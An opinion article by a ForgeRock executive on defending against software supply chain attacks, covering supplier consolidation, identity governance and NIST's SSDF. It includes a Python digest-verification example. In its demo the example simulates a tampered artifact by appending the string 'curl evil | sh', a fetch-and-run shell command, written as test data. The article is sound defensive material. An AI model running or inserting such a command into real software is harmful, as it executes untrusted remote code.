Defending against the threat of software supply chain attacks

Asia's Tech News Daily

The threat of software supply chain attacks has been well known for years, yet governments and businesses are still playing catch-up. The pandemic accelerated the shift of work and commerce online, cyber threats are growing with it, and businesses need to do more to protect themselves from such attacks.

One of the reasons software supply chain attacks are so potent is that they are so varied in targets, methods and impacts. At a basic level, a software supply chain attack inserts malware or a malicious component into a trusted piece of software or hardware, typically by compromising the supplier's build system, update channel or a dependency it relies on, so that the malicious code reaches victims carrying the supplier's own trust and signatures. With one well-placed intrusion, an attack can ripple across a supplier's network of customers, sometimes numbering thousands of victims.

About the author

Nick Caley is Vice President of ForgeRock for UK and Ireland.

Major attacks like SolarWinds and Kaseya have exposed how much today's organizations rely on third-party software suppliers, pushing the issue up the agenda in boardrooms and government.

But is enough being done? The UK Department for Digital, Culture, Media and Sport's Cyber Security Breaches Survey 2021 found that only 12% of businesses had reviewed the cybersecurity risks posed by their immediate suppliers. The UK government has only recently begun consulting on a set of minimum security standards for third-party suppliers involved in government procurement, so official guidance will not be forthcoming for some time.

With attacks on the rise, protecting businesses from software supply chain attacks is not only a business imperative: it is crucial to insulating the wider economy from the ripple effects. So what can businesses do to prepare today?

Streamlining the software supply chain

A 2019 Gartner survey found that 60% of organizations work with more than a thousand third parties, and many expect that number to grow. Today's digital supply chains are unprecedented in their scale and interconnectedness.

To minimize the risk of supply chain attacks, businesses should therefore aim to narrow their attack surface, primarily by reducing the number of external suppliers they work with. As Toyota does with its hardware supply chain, the focus should shift to relying on fewer suppliers with whom a relationship of deep trust and understanding is built. Working with fewer suppliers lets a business concentrate its security and compliance effort on each one, and work proactively with those trusted third parties at every stage of the relationship.

Focus can then shift to ongoing monitoring rather than a point-in-time approach centered on initial due diligence or a recertification some time down the line. With fewer suppliers, supply chain security can be reviewed more regularly and adapted to new and evolving threats.

Securing access and entitlements within organizations

The pandemic has thrown up a host of cybersecurity challenges, and organizations' legacy identity governance tools, which depend on manually managing user access and manually monitoring access privileges, are straining under the pressure. Sprawling, and therefore exposed, software supply chains add to an already dangerous situation, making it increasingly difficult for security teams to ensure that the right person has access to the right applications at the right time, and to nothing more.

The result is that organizations are left unsure who has access to what and, more importantly, why they have it. ForgeRock's Consumer Identity Breach Report found that 43% of US data breaches are caused by unauthorized access.

Manually managing the end-to-end identity lifecycle and access requests across a growing digital supply chain is expensive, fraught with risk, and creates extensive compliance challenges. New workers, suppliers and partners joining the ecosystem are easily overprovisioned, producing 'entitlement creep' as accumulated rights outgrow what their role requires. At the other end, access for those who leave the ecosystem is often not fully deprovisioned. Assessing access rights is a dynamic, ongoing task; when it is reduced to form filling, box ticking and rubber stamping, the unreviewed entitlements that remain are exactly what exposes the organization to a breach.

Using AI to automate access approvals, recommend certification of low-risk accounts and automatically remove unnecessary roles frees IT, compliance and security teams to focus on high-risk requests and on overprovisioned supplier and partner access; the automated decisions should remain explainable and auditable so that reviewers can challenge them. Tackling risky access with AI-powered identity governance leaves fewer standing entitlements for a software supply chain attack to exploit, and so makes such attacks harder to carry out.

Implement secure-by-design software development

When it comes to the development and distribution of third-party software, knowing the right questions to ask suppliers is crucial to ensuring that their security is of the highest standard. A demanding and inquisitive approach not only secures a company's own digital supply chain; it also strengthens trust in the ecosystem as a whole, especially on the part of government officials.

Luckily, the National Institute of Standards and Technology (NIST), a globally recognized standard-setting body within the US Department of Commerce, has published a widely recognized framework, the Secure Software Development Framework (SSDF), that establishes a common language and a set of practices for the developers, vendors and officials involved in software development, distribution and procurement.

NIST's guidance groups its practices into four areas: preparing the organization so that its people, processes and tooling can perform secure development at both the organization level and for individual projects; protecting software and its components from tampering and unauthorized access; producing well-secured software; and responding to vulnerabilities as they arise while preventing their recurrence through incremental process improvement.
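One concrete form the 'protecting software from tampering' practice takes on the consuming side is verifying every supplier artifact against pinned digests before it is installed, and failing closed on anything unexpected. The following is an added example written for this article, not code from NIST, ForgeRock or any supplier; the lockfile format (sha256sum-style lines) and the artifacts are constructed here, and a real pipeline would additionally verify the supplier's signature over the lockfile (for instance with GPG or Sigstore) before trusting the digests in it.

```python
"""Verify downloaded supplier artifacts against a pinned-digest lockfile.
Added example with constructed artifacts; fails closed on mismatch, missing
and unpinned files."""
import hashlib
import hmac
import os
import tempfile
from typing import Dict

CHUNK = 1 << 16


def sha256_file(path: str) -> str:
    """Stream the file through SHA-256 so large artifacts are not read into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_lockfile(text: str) -> Dict[str, str]:
    """Parse '<sha256 hex>  <filename>' lines (sha256sum output format) into {name: digest}.
    Rejects malformed digests, path components and duplicate entries."""
    pins: Dict[str, str] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"lockfile line {lineno}: expected '<digest>  <name>'")
        digest, name = parts[0].lower(), parts[1].strip()
        if len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
            raise ValueError(f"lockfile line {lineno}: not a SHA-256 hex digest")
        if os.path.basename(name) != name:
            raise ValueError(f"lockfile line {lineno}: path components are not allowed")
        if name in pins:
            raise ValueError(f"lockfile line {lineno}: duplicate entry for {name}")
        pins[name] = digest
    return pins


def verify_directory(directory: str, pins: Dict[str, str]) -> Dict[str, str]:
    """Return {name: 'ok' | 'mismatch' | 'missing' | 'unpinned'} covering the union of
    pinned names and files present, so nothing can slip in or drop out unnoticed."""
    status: Dict[str, str] = {}
    present = set(os.listdir(directory))
    for name in sorted(present | set(pins)):
        if name not in pins:
            status[name] = "unpinned"
        elif name not in present:
            status[name] = "missing"
        elif hmac.compare_digest(sha256_file(os.path.join(directory, name)), pins[name]):
            status[name] = "ok"
        else:
            status[name] = "mismatch"
    return status


# Constructed stand-ins for a supplier's pristine release artifacts.
PRISTINE = {
    "vendor-agent-1.4.2.tar.gz": b"pristine agent build\n",
    "vendor-plugin-0.9.0.zip": b"pristine plugin build\n",
    "vendor-docs-0.9.0.pdf": b"release notes\n",
}


def build_lockfile(artifacts: Dict[str, bytes]) -> str:
    """Produce the lockfile the supplier would publish (and sign) for a release."""
    return "".join(f"{hashlib.sha256(data).hexdigest()}  {name}\n"
                   for name, data in sorted(artifacts.items()))


def demo() -> Dict[str, str]:
    """Pin the pristine release, then verify a download directory containing one
    tampered artifact, one missing artifact and one file nobody approved."""
    pins = parse_lockfile(build_lockfile(PRISTINE))
    with tempfile.TemporaryDirectory() as d:
        downloaded = dict(PRISTINE)
        downloaded["vendor-plugin-0.9.0.zip"] += b"; curl evil | sh\n"  # tampered in transit
        del downloaded["vendor-docs-0.9.0.pdf"]                         # never arrived
        downloaded["vendor-extra.jar"] = b"unexpected file\n"           # not in the release
        for name, data in downloaded.items():
            with open(os.path.join(d, name), "wb") as f:
                f.write(data)
        return verify_directory(d, pins)


if __name__ == "__main__":
    results = demo()
    for name, result in results.items():
        print(f"{result:9} {name}")
    print("deploy allowed:", all(r == "ok" for r in results.values()))
```

Only the untouched agent archive verifies; the altered plugin, the absent documentation and the unexpected jar are each reported, and deployment is blocked because any non-`ok` status is a failure. Pinning digests this way protects against tampering after the release was cut, which is why the lockfile itself must come from a trusted, signed source.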

Implementing NIST's guidance, and asking suppliers to show how they meet it, allows businesses to assess the cybersecurity of their software suppliers and to build trust with customers and partners across the digital supply chain.

With ENISA, the EU's cybersecurity agency, forecasting a fourfold increase in supply chain attacks in 2021 compared with 2020, it is crucial that all businesses involved in global software supply chains embrace a risk-informed approach to protect themselves and society. This means streamlining their supply chains, implementing secure-by-design software development and adopting modern, AI-powered identity governance. There no longer needs to be a compromise between user productivity, user experience and robust security.

The recent White House meeting convened by the Biden administration with the CEOs of large American tech companies to discuss bolstering software supply chain security underscores that this will remain an important issue for all stakeholders for the foreseeable future. The stakes are too high to ignore.
